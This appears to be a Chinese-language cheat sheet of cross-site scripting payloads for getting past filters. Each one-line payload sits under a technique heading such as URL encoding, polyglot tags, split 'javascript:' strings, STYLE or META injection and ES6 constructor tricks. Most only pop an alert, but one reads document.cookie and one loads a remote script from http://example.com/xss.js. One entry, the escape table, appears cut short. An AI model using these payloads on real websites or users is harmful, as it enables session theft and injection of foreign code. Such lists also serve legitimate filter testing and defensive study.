-使用URL编码器对整个代码进行编码
1 | ';alert(String.fromCharCode(88,83,83))// |
-较短的xss定位器
1 | ";!--"<XSS>=&{()} |
-利用多语言进行过滤绕过
1 | '">><marquee><img src=x onerror=confirm(1)></marquee>"></plaintext\> |
-HTML实体
1 | <IMG SRC=javascript:alert("XSS")> |
-重音符混淆
1 | <IMG SRC=`javascript:alert("xss")`> |
-A标签
1 | <a onmouseover="alert(document.cookie)">xss link</a> |
-IMG标签
1 | <IMG """><SCRIPT>alert("xss")</SCRIPT>"> |
-内嵌TAB
1 | <IMG SRC="jav ascript:alert('XSS');"> |
-内嵌换行分割
1 | <IMG SRC="jav
ascript:alert('XSS');"> |
-内嵌回车
1 | <IMG SRC="jav
ascript:alert('XSS');"> |
-JavaScript双重转义
1 | \";alert('XSS');// |
-ECMAScript 6
1 | Set.constructor`alert\x28document.domain\29` |
-事件处理程序
1 | 1. FSCommand() (攻击者当需要在嵌入的Flash对象中执行时可以使用此事件) |
-含有分隔JavaScript的STYLE标签
1 | <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> |
-META
1 | <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> |
Alert混淆以绕过过滤器
1 | (alert)(1) |
-字符转义表
1 | < |
-使用HTML引号包含的XSS
1 | <SCRIPT a=">" SRC="http://example.com/xss.js"></SCRIPT> |
-Other
1 | [][`filter`][`constructor`](`ale`.concat(`rt\x28`.concat`0\x29`))();// |